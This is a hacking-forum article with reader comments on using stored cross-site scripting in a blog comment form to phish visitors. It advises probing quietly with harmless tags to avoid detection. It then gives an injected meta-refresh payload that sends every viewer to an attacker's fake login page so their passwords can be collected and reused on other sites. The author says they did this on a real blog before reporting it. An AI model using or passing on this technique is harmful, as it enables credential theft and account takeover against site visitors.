Welcome to HBH! If you had an account on hellboundhacker.org you will need to reset your password using the Lost Password system before you will be able to login.

XSS Attacks and Phishing

  1. Home
  2. Articles
  3. Web Hacking
  4. XSS Attacks and Phishing

XSS Attacks and Phishing

By ghostghost | 5717 Reads |
0     0

Ok, alot of you know what XSS is but some of you dont. Its basically the injection of HTML/Javascript etc. into a form or input area. I recently used XSS in the interesting way i will present below on a blog site. Ok, so you arrive on site, you wanna be able to find out if its vulnerable to XSS without being to suspiciouse. Obviously if you type markup<script> javascript:alert (/owned/)</script> in and it turns out not to work, your gonna be conspicuous and probably end up getting banned from the site.(which you may or may not care about) Anyhow, so you come to a form, this can be a Shoutbox, Chat area, Comment Form, Registration Page, Login, etc. In this example, i’ll use the comment form to a blog, since thats what i did on the blog site i recently encountered.(Of course i was nice enough to report it , but only after getting a couple passes and havin some fun) So try injecting markup <i>Hey</i> first, then if it doesnt go through, they might just think you were tryin to italisize your words, just for kicks. If it goes through and in the comment area you see the words are italisized and no tags, than presto, XSS VULNERABLE!! Okay, so now you can go ahead and do the skiddish way of XSS injection and put in your javascript alert. Ooor you could set up a redirection to a Fake Login or Phishing page you set up etc. Ok, so first you go and make your fake login page on whatever host. And of course, make it look EXACTLY like the login for the BlogSite<>.

<head>
<meta http-equiv="Refresh" content="0;URL=http://www.myphishinpage.com/login.php">
</head>
</html>

—So now every time somone views the injected blog, they’ll be redirected to your fake login, then leading to them using it (thinking, oops, got logged out somehow) then giveing you there login info. And if you know other sites those people go on, you can probably use the login on those too. See a majority of people use the same password at least, on every site they go to, i confess, i do on most sites. Soo anyway you get my point, this is a much more effective (in my opinion) method to using XSS injections. YOU can be SKIDDISH and put a oh so terrifing javascript alert. Orrrr you can get some good ol’ passes. Your choice, guess thats it, love ya HBH’ers . PEACE. B)

Comments
ghost's avatar
ghost 17 years ago

Sorry, not as good as i had hoped. ahh well. .. i was tired and lazy when i wrote this, not my best.

ghost's avatar
ghost 17 years ago

meh…..it works. and you can always edit it

ghost's avatar
ghost 17 years ago

yeah, i did edit a little..its fine for now, i might add some more later

ghost's avatar
ghost 17 years ago

i liked this a lot =]